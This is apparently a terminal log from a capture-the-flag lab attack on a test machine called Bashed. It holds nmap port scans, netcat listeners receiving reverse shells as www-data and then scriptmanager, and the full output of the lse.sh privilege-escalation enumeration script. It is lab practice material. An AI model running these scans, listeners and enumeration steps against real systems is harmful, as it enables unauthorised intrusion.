┌──(kali㉿offsec)-[~/Desktop] └─$ sudo nmap -p- --min-rate=10000 -oG allports 10.10.10.68 [sudo] kali 的密码: Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-19 23:11 CST Warning: 10.10.10.68 giving up on port because retransmission cap hit (10). Nmap scan report for10.10.10.68 Host is up (0.32s latency). Not shown: 64287 closed tcp ports (reset), 1247 filtered tcp ports (no-response) PORT STATE SERVICE 80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 43.88 seconds
┌──(kali㉿offsec)-[~/Desktop] └─$ sudo nmap -p- --min-rate=10000 -oG allports1 10.10.10.68 -sU Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-19 23:13 CST Warning: 10.10.10.68 giving up on port because retransmission cap hit (10). Nmap scan report for10.10.10.68 Host is up (0.43s latency). All 65535 scanned ports on 10.10.10.68 are in ignored states. Not shown: 65444 open|filtered udp ports (no-response), 91 closed udp ports (port-unreach)
Nmap done: 1 IP address (1 host up) scanned in 78.15 seconds
┌──(kali㉿offsec)-[~/Desktop] └─$ sudo nmap -p80 --min-rate=1000010.10.10.68 -sV -sC Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-19 23:26 CST Nmap scan report for10.10.10.68 Host is up (1.2s latency).
PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-title: Arrexel's Development Site |_http-server-header: Apache/2.4.18 (Ubuntu)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 19.73 seconds
┌──(kali㉿offsec)-[~/Desktop] └─$ rlwrap nc -lnvp 443 listening on [any] 443 ... connect to [10.10.14.45] from (UNKNOWN) [10.10.10.68] 34302 bash: cannot set terminal process group(821): Inappropriate ioctl for device bash: no job control in this shell www-data@bashed:/var/www/html/uploads$ id id uid=33(www-data) gid=33(www-data) groups=33(www-data) www-data@bashed:/var/www/html/uploads$
OS: Linux version 4.4.0-62-generic (buildd@lcy01-30) (gcc version 5.4.020160609 (Ubuntu 5.4.0-6ubuntu1~16.04.4) ) #83-Ubuntu SMP Wed Jan 1814:10:15 UTC 2017
listening on [any] 4444 ... connect to [10.10.14.45] from (UNKNOWN) [10.10.10.68] 60220 bash: cannot set terminal process group(821): Inappropriate ioctl for device bash: no job control in this shell scriptmanager@bashed:/var/www/html/uploads$ id id uid=1001(scriptmanager) gid=1001(scriptmanager) groups=1001(scriptmanager) scriptmanager@bashed:/var/www/html/uploads$
scriptmanager@bashed:~$ chmod +x lse.sh chmod +x lse.sh scriptmanager@bashed:~$ ./lse.sh --- If you know the current user password, write it here to check sudo privileges: ---
=====================( Current Output Verbosity Level: 0 )====================== ===============================================================( humanity )===== [!] nowar0 Should we question autocrats and their "military operations"?... yes! --- NO WAR --- ==================================================================( users )===== [i] usr000 Current user groups............................................. yes! [*] usr010 Is current user in an administrative group?..................... nope [*] usr020 Are there other users in administrative groups?................. yes! [*] usr030 Other users with shell.......................................... yes! [i] usr040 Environment information......................................... skip [i] usr050 Groups for other users.......................................... skip [i] usr060 Other users..................................................... skip [*] usr070 PATH variables defined inside /etc.............................. yes! [!] usr080 Is '.' in a PATH variable defined inside /etc?.................. nope ===================================================================( sudo )===== [!] sud000 Can we sudo without a password?................................. nope [!] sud010 Can we list sudo commands without a password?................... nope [*] sud040 Can we read sudoers files?...................................... nope [*] sud050 Do we know if any other users used sudo?........................ yes! ============================================================( file system )===== [*] fst000 Writable files outside user's home.............................. yes! [*] fst010 Binaries with setuid bit........................................ yes! [!] fst020 Uncommon setuid binaries........................................ yes! --- /usr/bin/vmware-user-suid-wrapper --- [!] fst030 Can we write to any setuid binary?.............................. nope [*] fst040 Binaries with setgid bit........................................ skip [!] fst050 Uncommon setgid binaries........................................ skip [!] fst060 Can we write to any setgid binary?.............................. skip [*] fst070 Can we read /root?.............................................. nope [*] fst080 Can we read subdirectories under /home?......................... yes! [*] fst090 SSH files in home directories................................... nope [*] fst100 Useful binaries................................................. yes! [*] fst110 Other interesting files in home directories..................... nope [!] fst120 Are there any credentials in fstab/mtab?........................ nope [*] fst130 Does 'scriptmanager' have mail?................................. nope [!] fst140 Can we access other users mail?................................. nope [*] fst150 Looking for GIT/SVN repositories................................ nope [!] fst160 Can we write to critical files?................................. nope [!] fst170 Can we write to critical directories?........................... nope [!] fst180 Can we write to directories from PATH defined in /etc?.......... nope [!] fst190 Can we read any backup?......................................... nope [!] fst200 Are there possible credentials in any shell history file?....... nope [!] fst210 Are there NFS exports with 'no_root_squash' option?............. nope [*] fst220 Are there NFS exports with 'no_all_squash' option?.............. nope [i] fst500 Files owned by user 'scriptmanager'............................. skip [i] fst510 SSH files anywhere.............................................. skip [i] fst520 Check hosts.equiv file and its contents......................... skip [i] fst530 List NFS server shares.......................................... skip [i] fst540 Dump fstab file................................................. skip =================================================================( system )===== [i] sys000 Who is logged in................................................ skip [i] sys010 Last logged in users............................................ skip [!] sys020 Does the /etc/passwd have hashes?............................... nope [!] sys022 Does the /etc/group have hashes?................................ nope [!] sys030 Can we read shadow files?....................................... nope [*] sys040 Check for other superuser accounts.............................. nope [*] sys050 Can root user log in via SSH?................................... nope [i] sys060 List available shells........................................... skip [i] sys070 System umask in /etc/login.defs................................. skip [i] sys080 System password policies in /etc/login.defs..................... skip ===============================================================( security )===== [*] sec000 Is SELinux present?............................................. nope [*] sec010 List files with capabilities.................................... yes! [!] sec020 Can we write to a binary with caps?............................. nope [!] sec030 Do we have all caps in any binary?.............................. nope [*] sec040 Users with associated capabilities.............................. nope [!] sec050 Does current user have capabilities?............................ skip [!] sec060 Can we read the auditd log?..................................... nope ========================================================( recurrent tasks )===== [*] ret000 User crontab.................................................... nope [!] ret010 Cron tasks writable by user..................................... nope [*] ret020 Cron jobs....................................................... yes! [*] ret030 Can we read user crontabs....................................... nope [*] ret040 Can we list other user cron tasks?.............................. nope [*] ret050 Can we write to any paths present in cron jobs.................. nope [!] ret060 Can we write to executable paths present in cron jobs........... skip [i] ret400 Cron files...................................................... skip [*] ret500 User systemd timers............................................. nope [!] ret510 Can we write in any system timer?............................... nope [i] ret900 Systemd timers.................................................. skip ================================================================( network )===== [*] net000 Services listening only on localhost............................ nope [!] net010 Can we sniff traffic with tcpdump?.............................. nope [i] net500 NIC and IP information.......................................... skip [i] net510 Routing table................................................... skip [i] net520 ARP table....................................................... skip [i] net530 Nameservers..................................................... skip [i] net540 Systemd Nameservers............................................. skip [i] net550 Listening TCP................................................... skip [i] net560 Listening UDP................................................... skip ===============================================================( services )===== [!] srv000 Can we write in service files?.................................. nope [!] srv010 Can we write in binaries executed by services?.................. nope [*] srv020 Files in /etc/init.d/ not belonging to root..................... nope [*] srv030 Files in /etc/rc.d/init.d not belonging to root................. nope [*] srv040 Upstart files not belonging to root............................. nope [*] srv050 Files in /usr/local/etc/rc.d not belonging to root.............. nope [i] srv400 Contents of /etc/inetd.conf..................................... skip [i] srv410 Contents of /etc/xinetd.conf.................................... skip [i] srv420 List /etc/xinetd.d if used...................................... skip [i] srv430 List /etc/init.d/ permissions................................... skip [i] srv440 List /etc/rc.d/init.d permissions............................... skip [i] srv450 List /usr/local/etc/rc.d permissions............................ skip [i] srv460 List /etc/init/ permissions..................................... skip [!] srv500 Can we write in systemd service files?.......................... nope [!] srv510 Can we write in binaries executed by systemd services?.......... nope [*] srv520 Systemd files not belonging to root............................. nope [i] srv900 Systemd config files permissions................................ skip ===============================================================( software )===== [!] sof000 Can we connect to MySQL with root/root credentials?............. nope [!] sof010 Can we connect to MySQL as root without password?............... nope [!] sof015 Are there credentials in mysql_history file?.................... nope [!] sof020 Can we connect to PostgreSQL template0 as postgres and no pass?. nope [!] sof020 Can we connect to PostgreSQL template1 as postgres and no pass?. nope [!] sof020 Can we connect to PostgreSQL template0 as psql and no pass?..... nope [!] sof020 Can we connect to PostgreSQL template1 as psql and no pass?..... nope [*] sof030 Installed apache modules........................................ yes! [!] sof040 Found any .htpasswd files?...................................... nope [!] sof050 Are there private keys in ssh-agent?............................ nope [!] sof060 Are there gpg keys cached in gpg-agent?......................... nope [!] sof070 Can we write to a ssh-agent socket?............................. nope [!] sof080 Can we write to a gpg-agent socket?............................. nope [!] sof090 Found any keepass database files?............................... nope [!] sof100 Found any 'pass' store directories?............................. nope [!] sof110 Are there any tmux sessions available?.......................... nope [*] sof120 Are there any tmux sessions from other users?................... nope [!] sof130 Can we write to tmux session sockets from other users?.......... nope [!] sof140 Are any screen sessions available?.............................. nope [*] sof150 Are there any screen sessions from other users?................. nope [!] sof160 Can we write to screen session sockets from other users?........ nope [*] sof170 Can we access MongoDB databases without credentials?............ nope [!] sof180 Can we access any Kerberos credentials?......................... nope [i] sof500 Sudo version.................................................... skip [i] sof510 MySQL version................................................... skip [i] sof520 Postgres version................................................ skip [i] sof530 Apache version.................................................. skip [i] sof540 Tmux version.................................................... skip [i] sof550 Screen version.................................................. skip =============================================================( containers )===== [*] ctn000 Are we in a docker container?................................... nope [*] ctn010 Is docker available?............................................ nope [!] ctn020 Is the user a member of the 'docker' group?..................... nope [*] ctn200 Are we in a lxc container?...................................... nope [!] ctn210 Is the user a member of any lxc/lxd group?...................... nope ==============================================================( processes )===== [i] pro000 Waiting for the process monitor to finish....................... yes! [i] pro001 Retrieving process binaries..................................... yes! [i] pro002 Retrieving process users........................................ yes! [!] pro010 Can we write in any process binary?............................. nope [*] pro020 Processes running with root permissions......................... yes! [*] pro030 Processes running by non-root users with shell.................. yes! [i] pro500 Running processes............................................... skip [i] pro510 Running process binaries and permissions........................ skip ===================================================================( CVEs )===== In order to test for CVEs, download lse.sh from the GitHub releases page. Alternatively, build lse_cve.sh using tools/package_cvs_into_lse.sh from the repository. ==================================( FINISHED )==================================